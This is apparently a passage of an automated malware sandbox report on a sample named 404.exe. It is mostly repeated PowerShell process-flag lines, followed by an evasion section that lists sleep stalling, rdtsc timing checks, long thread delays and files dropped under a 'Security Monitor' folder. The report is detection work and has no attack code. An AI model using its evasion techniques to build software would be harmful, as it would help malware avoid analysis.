            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeStalling execution: Execution stalls by calling Sleepgraph_65-38315
            Source: C:\Users\user\Desktop\404.exeMemory allocated: AB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\404.exeMemory allocated: 25E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\404.exeMemory allocated: AB0000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033CB8B0 rdtsc 51_2_033CB8B0
            Source: C:\Users\user\Desktop\404.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\404.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Users\user\Desktop\404.exeWindow / User API: threadDelayed 4221Jump to behavior
            Source: C:\Users\user\Desktop\404.exeWindow / User API: threadDelayed 5594Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7681Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1854Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6697
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3102
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1937
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7684
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8131
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1386
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7831
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1781
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1007
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8505
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6878
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2764
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6329
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2795
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8129
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1518
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7783
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1798
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)Jump to dropped file
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeDropped PE file which has not been started: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpDropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-A63B5.tmpJump to dropped file
